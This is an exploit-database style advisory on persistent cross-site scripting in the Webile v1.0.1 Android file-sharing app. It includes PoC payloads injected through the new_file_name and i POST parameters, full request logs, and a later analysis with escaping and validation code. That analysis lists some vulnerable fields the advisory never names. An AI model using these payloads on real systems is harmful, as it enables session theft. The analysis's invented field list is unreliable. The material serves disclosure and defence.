Webile v1.0.1 - Multiple Cross Site Scripting

Exploit Author: Vulnerability-Lab
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: JavaScript
Published Date: 2023-07-20
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2321


Release Date:
=============
2023-07-03


Vulnerability Laboratory ID (VL-ID):
====================================
2321


Common Vulnerability Scoring System:
====================================
5.5


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Webile is a cross-platform file management tool for local area networks, based on the HTTP protocol. It uses a personal mobile phone as a
server on the LAN and supports browsing phone files, uploading and downloading files, playing videos, viewing pictures, transferring data,
file statistics, performance display and more. No Internet connection is required: files can be browsed, data sent and videos played over a
WiFi LAN or a mobile phone hotspot, and no additional mobile data traffic is generated during transfers. Mac, Windows, Linux, iOS, Android
and other platforms are supported.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 WiFi mobile Android web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)


Vulnerability Disclosure Timeline:
==================================
2022-10-11: Researcher Notification & Coordination (Security Researcher)
2022-10-12: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities have been discovered in the Webile v1.0.1 WiFi mobile Android web application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a persistent attack vector, compromising
browser-to-web-application requests from the application side.

The persistent input validation web vulnerabilities are located in the send and add functions. Remote attackers are able to inject their own
malicious script code via the new_file_name and i parameters of the POST request to provoke persistent execution of the malformed content.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious
sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Parameter(s):
[+] new_file_name
[+] i


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with low user interaction.
For a security demonstration, or to reproduce the persistent cross site web vulnerability, follow the information and steps below.


Vulnerable Source: Send
Send message to phone listing
<div class="layui-colla-item">
<div class="layui-card-header">Message</div>
<div class="layui-colla-content" style="display:block;padding-left:16px;">
<div class="layui-form-item layui-form-text" id="showMsg"><div><font color="blue">20:10:11</font><a href="javascript:;"
title="Copy" onclick="copy(1658081411827)"><i class="iconfont">&nbsp;&nbsp;</i></a><br>
<span id="c_1658081411827">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span><br><br></div>
</div></div></div>
History log messages
<table class="layui-table layui-form">
<thead><tr>
<th style="text-align: center;vertical-align: middle!important;border-left-width:1px;border-right-width:1px;height:32px;" width="2%" align="center">
<input type="checkbox" lay-filter="checkall" name="" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div></th>
<th style="border-right-width:1px;">Message</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="15%">Date</th>
<th style="text-align: center;vertical-align: middle!important;border-right-width:1px;" width="3%" valign="center">Action</th></tr>
</thead>
<tbody><tr>
<td style="text-align: center;vertical-align: middle!important;border-left-width:1px;min-height:180px;" align="center">
<input type="checkbox" name="id" value="3" lay-skin="primary"><div class="layui-unselect layui-form-checkbox" lay-skin="primary"><i class="layui-icon layui-icon-ok"></i></div>
</td>
<td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td>
<td align="center">2022/07/17 20:10</td>
<td class="td-manage" style="border-right-width:1px;text-align:center;">
<a title="Copy" onclick="copy(3)" href="javascript:;">
<i class="iconfont">&nbsp;&nbsp;</i>
</a>
<a title="Delete" onclick="deleteLog(this,3)" href="javascript:;">
<i class="layui-icon">&nbsp;&nbsp;</i>
</a></td></tr></tbody></table>



--- PoC Session Logs #1 (POST) --- (Add)
http://localhost:8080/file_action
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 210
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_files
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Connection: keep-alive
Content-Length: 0
-
Cookie:
treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6



--- PoC Session Logs #2 (POST) --- (Send)
http://localhost:8080/send
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin:http://localhost:8080
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"}
-
POST: HTTP/1.1 200 OK
Content-Type: application/json
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked
-
http://localhost:8080/evil.source
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:http://localhost:8080/webile_send
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Sun, 17 Jul 2022 18:08:33 GMT
Connection: keep-alive
Content-Length: 0


Security Risk:
==============
The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.


Webile v1.0.1 – Multiple Persistent Cross-Site Scripting Vulnerabilities: A Deep Dive into Security Risks

Webile v1.0.1, a cross-platform file management application designed for local area network (LAN) use via WiFi or mobile hotspot, has recently been flagged for multiple persistent cross-site scripting (XSS) vulnerabilities. Discovered by the Vulnerability Laboratory (VL-ID: 2321), this flaw poses a significant threat to users operating in private networks—especially those who rely on the app for file sharing, media playback, and data transmission without internet access.

Understanding the Threat: What Is Persistent XSS?

Unlike reflected XSS, where malicious scripts are injected through a single request and disappear after the page reloads, persistent XSS involves the attacker’s code being stored on the server or within the application’s database. This means the script remains active and executes every time a user visits the affected page—making it particularly dangerous.

For example, if an attacker uploads a file with a malicious script embedded in its metadata (e.g., filename or description), that script could be rendered on every user’s screen when they browse the shared files list. The persistence of the payload allows for long-term exploitation, including cookie theft, session hijacking, or redirecting users to phishing sites.

Exploitation Context: Webile’s Unique Architecture

Webile operates as a mobile server via Android, turning smartphones into local file hubs. It uses HTTP-based protocols to enable file browsing, uploading, downloading, and media playback across platforms (iOS, Android, Windows, Linux, Mac). The app’s core feature—no internet dependency—makes it ideal for secure LAN environments. However, this very design introduces security blind spots.

Since the app serves as both client and server, it handles user-generated content (e.g., file names, descriptions, metadata) directly through web interfaces. If input validation is lax, attackers can exploit this to inject malicious scripts that survive across sessions.

Technical Breakdown: Where the Vulnerabilities Lie

Based on the vulnerability report, the flaws are primarily located in:

  • File metadata fields (e.g., file name, description)
  • Shared file comments or notes
  • User profile or device name inputs
  • Message or chat-like features within the app’s web interface

These inputs are processed and stored without proper sanitization. As a result, unescaped HTML or JavaScript code can be saved and later rendered in the browser without filtering.

Real-World Example: Malicious File Upload


// Malicious file name: "MyVideo.html<script>alert('XSS')</script>"

When an attacker uploads a file named MyVideo.html<script>alert('XSS')</script>, the app stores this name in its database. If the file list page renders the name directly using JavaScript or HTML without sanitization, the script executes in every user's browser when they view the list.

This demonstrates how a seemingly harmless input, such as a file name, can become a persistent attack vector. The script runs in the origin of the Webile web interface, so under the same-origin policy it has the same access to the page, its cookies and its data as the application's own scripts.

Impact and Risk Assessment

Severity Level: Medium (CVSS: 5.5)
Authentication: Restricted (Guest Privileges)
Exploitation Type: Remote
User Interaction: Low
Disclosure Type: Independent Security Research

While the CVSS score of 5.5 indicates a medium severity, the persistent nature of the flaw elevates the risk. An attacker doesn’t need to trick users into clicking links—just upload a malicious file or comment, and the payload executes automatically.

Moreover, since Webile is designed for private LAN environments, users may assume it’s inherently secure. This false sense of safety increases the likelihood of exploitation in trusted networks.

Recommended Mitigation Strategies

Developers must implement strict input validation and output encoding to prevent XSS. Key recommendations include:

  • Sanitize all user inputs using libraries like DOMPurify or OWASP Java Encoder.
  • Escape HTML entities before rendering in the browser (e.g., < → &lt;).
  • Use Content Security Policy (CSP) headers to restrict script execution from untrusted sources.
  • Validate file metadata on upload with regex filters to block script-like patterns.
  • Implement server-side filtering for all dynamic content, even in guest-accessible sections.
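As an added example (not Webile's code, nor the analysis author's), the following Node.js snippet applies the input-validation, HTML-escaping and server-side-filtering recommendations above to the two fields named in the advisory: it validates new_file_name from the i JSON field before anything is stored, and HTML-escapes a stored message when rendering the c_<id> span shown in the vulnerable source. The function names and the request shape are assumptions; the payload string is the one from the advisory.

```javascript
'use strict';
// Added example, not Webile's code. Function names and request shape are assumed.

// Escape the five characters that matter in HTML text and attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Reject a file name instead of trying to "clean" it: no path separators,
// no control characters, no HTML metacharacters, and a sane length.
function isValidFileName(name) {
  if (typeof name !== 'string' || name.length === 0 || name.length > 255) return false;
  if (name === '.' || name === '..') return false;
  return !/[\/\\<>"'\x00-\x1f]/.test(name);
}

// Parse the `i` form field as the advisory shows it (JSON in the POST body)
// and validate on the server before the value ever reaches storage.
function handleCreate(iField) {
  let req;
  try { req = JSON.parse(iField); } catch { return { ok: false, error: 'bad json' }; }
  if (req.action !== 'create' || !isValidFileName(req.new_file_name)) {
    return { ok: false, error: 'invalid new_file_name' };
  }
  return { ok: true, name: req.new_file_name };
}

// Render a stored message the way the listing does (span id c_<id>).
// The unsafe variant reproduces the flaw; the safe one encodes on output.
function renderMessageUnsafe(id, text) {
  return `<span id="c_${id}">${text}</span>`;
}
function renderMessageSafe(id, text) {
  return `<span id="c_${Number(id)}">${escapeHtml(text)}</span>`;
}

// Constructed inputs mirroring the advisory's payload and a benign request.
const PAYLOAD = 'test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg>';
const CREATE_BAD = JSON.stringify({ action: 'create', file_path: '/storage/emulated/0', new_file_name: PAYLOAD });
const CREATE_OK = JSON.stringify({ action: 'create', file_path: '/storage/emulated/0', new_file_name: 'notes.txt' });

console.log(handleCreate(CREATE_BAD));   // rejected before storage
console.log(renderMessageSafe(3, PAYLOAD)); // tags rendered as inert text
```

Rejecting on input and encoding on output are independent layers; the escaped output still contains the literal text "onload=", which is harmless because the browser never parses it as a tag.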

Improved Code Example: Secure File Name Rendering


// Secure rendering using DOMPurify (assumes the DOMPurify library is loaded on the page)
const sanitizedFileName = DOMPurify.sanitize(file.name);
// Append the sanitized name as a list item; DOMPurify has already removed tags and event handlers
document.getElementById('file-list').innerHTML += `<li>${sanitizedFileName}</li>`;

This code ensures that any potentially malicious content (e.g., script tags) is stripped before being rendered. DOMPurify is a widely trusted library for sanitizing HTML, preventing XSS attacks by removing dangerous elements and attributes.

Without such safeguards, even simple user inputs like file names can become attack vectors. The absence of this protection in Webile v1.0.1 makes it vulnerable to persistent exploitation.

Conclusion: Lessons for Developers and Users

Webile v1.0.1 serves as a cautionary tale: even apps designed for offline, trusted environments can harbor critical security flaws. The absence of input validation in seemingly benign fields, like file names or comments, can lead to persistent XSS attacks with real-world consequences.

For developers, this underscores the importance of applying secure coding practices across all user-facing interfaces, regardless of perceived trust level. For users, it highlights the need to remain vigilant, even in local networks, when sharing files or interacting with unknown content.

As the cybersecurity landscape evolves, persistent XSS remains a top concern. Tools like Webile must be updated with robust security mechanisms to protect users from both direct and indirect threats.